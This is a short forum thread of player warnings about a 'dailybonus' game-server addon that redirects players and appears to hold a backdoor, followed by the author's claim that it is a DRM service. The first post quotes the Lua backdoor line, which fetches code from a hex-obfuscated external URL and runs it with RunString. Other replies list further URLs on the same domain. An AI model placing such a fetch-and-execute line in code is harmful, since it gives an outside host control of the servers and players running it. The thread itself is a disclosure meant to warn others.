• [PSA] Some L33T Haxor Acting Up (DailyBonus Incident)
    5 replies, posted
Me > joins a random server > notices something weird > gets redirected to http://159.89.226.17/server/ people blames a backdoored addon using http.Fetch hidden in "dailybonus" http.Fetch( "\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x77\x70\x6f\x72\x74\x73\x65\x72\x76\x65\x72\x73\x2e\x78\x79\x7a\x2f\x6f\x62\x66\x75\x73\x63\x61\x74\x65\x64\x2e\x6c\x75\x61", function( b, l, h, c ) RunString( b ) end, function() end ) i dont like doing a PSA about a leaked addon but i just wanted to give a heads up if anyone comes across such problem PS: when i joined the server that i got redirected to i saw many confused people from very diffrent server all confused so its not pointed towards just a single server
http://newportservers.xyz/obfuscated.lua http://newportservers.xyz/player.php you dont exist on the backdoor bye https://newportservers.xyz/update.php Looks like a backdoor to me..
i havent been able to de-crypt it but im %100 positive that it is indeed a backdoor
this seems to be a bit of a misunderstanding, this is just a drm service i ran that allowed configurations on the client. All clients involved in this situation were shutdown and we're working on making this impossible to do again, until then it is disabled.
well i didnt know it also recurred in the original version too i just assumed that someone had it backdoored and shared through leaking sorry :P (no offense to you of course we're all humans and we make mistakes )
I can backup vex in this, I use the drm service myself for some small scripting jobs I do. Unfortunately it seems someone decided to take advantage of it.
Sorry, you need to Log In to post a reply to this thread.